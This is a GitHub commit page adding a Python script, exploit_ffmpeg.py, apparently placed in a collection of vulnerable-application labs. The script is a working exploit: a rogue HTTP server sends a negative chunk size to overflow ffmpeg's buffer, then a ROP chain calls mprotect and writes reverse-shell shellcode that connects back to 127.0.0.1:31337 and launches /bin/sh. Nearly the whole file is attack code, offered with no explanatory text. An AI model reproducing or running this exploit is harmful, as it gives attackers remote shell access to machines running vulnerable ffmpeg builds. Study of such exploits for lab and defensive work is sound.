Skip to content

Commit

Permalink
Create exploit_ffmpeg.py
Browse files Browse the repository at this point in the history 
https://gist.github.com/PaulCher/324690b88db8c4cf844e056289d4a1d6
  • Loading branch information
0c0c0f authored Feb 22, 2017
1 parent c1d1315 commit b356fb1
Showing 1 changed file with 138 additions and 0 deletions.
138 changes: 138 additions & 0 deletions app/ffmpeg/exploit_ffmpeg.py
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,138 @@
#!/usr/bin/python

import re
import os
import sys
import socket
import threading
from time import sleep

from pwn import *


bind_ip = '0.0.0.0'
bind_port = 12345


headers = """HTTP/1.1 200 OK
Server: HTTPd/0.9
Date: Sun, 10 Apr 2005 20:26:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA;
"""


elf = ELF('ffmpeg/ffmpeg')
shellcode_location = 0x00400000
page_size = 0x1000
rwx_mode = 7

gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))
pop_rdi = gadget('pop rdi; ret')
pop_rsi = gadget('pop rsi; ret')
pop_rax = gadget('pop rax; ret')
pop_rcx = gadget('pop rcx; ret')
pop_rdx = gadget('pop rdx; ret')
pop_rbp = gadget('pop rbp; ret')

push_rbx = gadget('push rbx; jmp rdi')
pop_rsp = gadget('pop rsp; ret')
add_rsp = gadget('add rsp, 0x58')

mov_gadget = gadget('mov qword [rcx], rax ; ret')

mprotect_func = elf.plt['mprotect']
read_func = elf.plt['read']



def handle_request(client_socket):
request = client_socket.recv(2048)

payload = ''
payload += 'C' * (0x8040)
payload += 'CCCCCCCC' * 4
payload += p64(0x0058dc48) # rop starts here
payload += 'CCCCCCCC' * 4

payload += p64(0x00d89257) # rdi
payload += p64(0x010ccd95) # call *%rax
payload += 'BBBBBBBB' * 3
payload += 'AAAA'
payload += p32(0)
payload += 'AAAAAAAA'
payload += p64(0x0058dc48) # second add_esp rop to jump to uncorrupted chunk
payload += 'XXXXXXXX' * 11

# real rop payload starts here
#
# using mprotect to create executable area
payload += p64(pop_rdi)
payload += p64(shellcode_location)
payload += p64(pop_rsi)
payload += p64(page_size)
payload += p64(pop_rdx)
payload += p64(rwx_mode)
payload += p64(mprotect_func)

# backconnect shellcode x86_64: 127.0.0.1:31337
shellcode = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\xc7\x44\x24\x04\x7f\x00\x00\x01\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05";
shellcode = '\x90' * (8 - (len(shellcode) % 8)) + shellcode
shellslices = map(''.join, zip(*[iter(shellcode)]*8))

write_location = shellcode_location - 8
for shellslice in shellslices:
payload += p64(pop_rax)
payload += shellslice
payload += p64(pop_rcx)
payload += p64(write_location)
payload += p64(mov_gadget)

write_location += 8

payload += p64(pop_rbp)
payload += p64(4)
payload += p64(shellcode_location)

# 0x009e5641: mov qword [rcx], rax ; ret ; (1 found)

# 0x010ccd95: push rbx ; jmp rdi ; (1 found)
# 0x00d89257: pop rsp ; ret ; (1 found)
# 0x0058dc48: add rsp, 0x58 ; ret ; (1 found)

client_socket.send(headers)
client_socket.send('-1\n')
sleep(5)
client_socket.send(payload)
client_socket.close()


if __name__ == '__main__':
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

s.bind((bind_ip, bind_port))
s.listen(5)

filename = os.path.basename(__file__)
st = os.stat(filename)

while True:
client_socket, addr = s.accept()
handle_request(client_socket)
if os.stat(filename) != st:
print 'restarted'
sys.exit(0)

0 comments on commit b356fb1

Please sign in to comment.